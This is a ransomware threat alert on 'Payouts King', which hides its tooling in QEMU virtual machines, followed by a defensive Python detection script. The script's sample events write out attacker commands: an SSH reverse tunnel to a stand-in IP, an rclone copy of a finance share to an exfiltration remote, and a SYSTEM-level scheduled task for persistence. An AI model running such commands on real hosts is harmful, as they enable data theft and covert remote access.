New Ransomware Threat “Payouts King” Evades Detection Through VM Exploitation


RANSOMWARE THREAT ALERT: “PAYOUTS KING” HIDES INSIDE VIRTUAL MACHINES TO DODGE DETECTION

Cybersecurity researchers have identified a ransomware threat tracked as “Payouts King” that runs its tooling inside hidden virtual machines (VMs) on compromised hosts, where endpoint security products installed on the host operating system cannot see it.

Tactics and Techniques:

  • Initial Access: Exploitation of exposed VPN appliances, such as SonicWall and Cisco SSL VPN products, and of vulnerable software such as SolarWinds Web Help Desk.
  • Social Engineering: Attackers impersonate IT support staff and contact employees over Microsoft Teams to talk them into installing malware.
  • Hidden Virtual Machines: Payouts King deploys the open-source virtualization tool QEMU on compromised systems and runs its tooling inside a guest VM that host-based security products do not inspect.
  • Data Exfiltration and Encryption: Data is exfiltrated with Rclone; victim files are then encrypted with AES-256, with the AES keys protected by RSA-4096, so recovery without the attacker's private key is infeasible.
  • Encryption Speed-up: Large files are encrypted intermittently (only part of each file is encrypted), which shortens the time needed to render a victim's data unusable.

According to cybersecurity experts, “The Payouts King ransomware campaign represents a major challenge for traditional defense systems, requiring organizations to adopt multi-layered security strategies and implement proactive measures to protect against such advanced cyber threats.”

Experts recommend monitoring for unauthorized QEMU installations, suspicious scheduled tasks that run with SYSTEM privileges, unusual SSH tunneling, and abnormal network traffic. Applying patches promptly, particularly to internet-exposed VPN and help-desk systems, and training employees to verify unsolicited IT-support contacts reduce the chance that such an attack succeeds.
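The following is an added example, not code from the article or from any vendor, showing how the three host-level indicators above (unauthorized QEMU binaries, scheduled tasks created to run as SYSTEM, and SSH port forwarding) plus Rclone transfers can be turned into simple detection rules run over process-creation telemetry. The records are constructed Sysmon-style Event ID 1 entries reduced to a few fields; the field names, the approved-QEMU-directory allowlist and the rule heuristics are assumptions, not anything the article specifies.

```python
import ntpath
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style), reduced to the
# fields the rules need. These are NOT real telemetry; IPs and paths are illustrative.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\qemu\qemu-system-x86_64.exe",
     "CommandLine": r"qemu-system-x86_64.exe -m 512 -hda C:\Users\Public\qemu\disk.qcow2 "
                    r"-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 -nographic",
     "User": r"CORP\j.doe", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "GoogleUpdateTaskMachineCore" '
                    r'/tr "C:\Users\Public\qemu\start.bat" /sc onstart /ru SYSTEM /f',
     "User": r"CORP\j.doe", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -R 8443:127.0.0.1:445 -p 443 user@203.0.113.10",
     "User": r"CORP\j.doe", "ParentImage": r"C:\Users\Public\qemu\start.bat"},
    {"Image": r"C:\ProgramData\rclone\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Shares\Finance remote:exfil --transfers 32",
     "User": r"NT AUTHORITY\SYSTEM", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign activity that the rules must not flag.
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n report.docx',
     "User": r"CORP\j.doe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"',
     "User": r"CORP\admin", "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Hypothetical allowlist: directories where an approved QEMU package may legitimately live.
APPROVED_QEMU_DIRS = (r"c:\program files\qemu",)

QEMU_BINARY_RE = re.compile(r"^qemu(-system-[a-z0-9_]+|-img)?\.exe$")
# /ru SYSTEM or /ru "NT AUTHORITY\SYSTEM" on a task-creation command line.
SCHTASKS_SYSTEM_RE = re.compile(r'/ru\s+"?(?:nt authority\\)?system"?')
# -R (reverse), -L (local) and -D (dynamic/SOCKS) forwarding; -N means "no remote command",
# the usual shape of a pure tunnel. Combined short flags (e.g. -NR) are not handled here.
SSH_FORWARD_RE = re.compile(r"(?:^|\s)-[RLDN](?=\s|\d|$)")
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_qemu_unapproved(ev):
    """QEMU launched from anywhere other than an approved install directory."""
    if not QEMU_BINARY_RE.match(_basename(ev["Image"])):
        return None
    if ntpath.dirname(ev["Image"]).lower().startswith(APPROVED_QEMU_DIRS):
        return None
    return "QEMU binary launched outside approved paths"


def rule_system_scheduled_task(ev):
    """schtasks /create ... /ru SYSTEM: persistence for the VM launcher with SYSTEM rights."""
    if _basename(ev["Image"]) != "schtasks.exe":
        return None
    cmd = ev["CommandLine"].lower()
    if "/create" in cmd and SCHTASKS_SYSTEM_RE.search(cmd):
        return "Scheduled task created to run as SYSTEM"
    return None


def rule_ssh_port_forward(ev):
    """ssh.exe started with port-forwarding flags (tunnel out of or into the host)."""
    if _basename(ev["Image"]) != "ssh.exe":
        return None
    if SSH_FORWARD_RE.search(ev["CommandLine"]):
        return "SSH started with port-forwarding options"
    return None


def rule_rclone_transfer(ev):
    """rclone copy/sync/move: bulk transfer of local data to a remote, typical of exfiltration."""
    if _basename(ev["Image"]) != "rclone.exe":
        return None
    tokens = ev["CommandLine"].split()
    if len(tokens) > 1 and tokens[1].lower() in RCLONE_TRANSFER_VERBS:
        return "Rclone bulk transfer invoked"
    return None


RULES = [rule_qemu_unapproved, rule_system_scheduled_task,
         rule_ssh_port_forward, rule_rclone_transfer]


def detect(events):
    """Apply every rule to every event; return one finding dict per (event, matching rule)."""
    findings = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"rule": rule.__name__.removeprefix("rule_"),
                                 "image": ev["Image"], "user": ev["User"], "detail": detail})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['user']}: {f['image']} - {f['detail']}")
```

In a real deployment the same predicates would be expressed in the SIEM or EDR query language against live process-creation events; the value of the Python form is that the rules and their false-positive boundaries (the allowlist, the /query-versus-/create distinction) can be unit-tested against recorded samples before being shipped.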


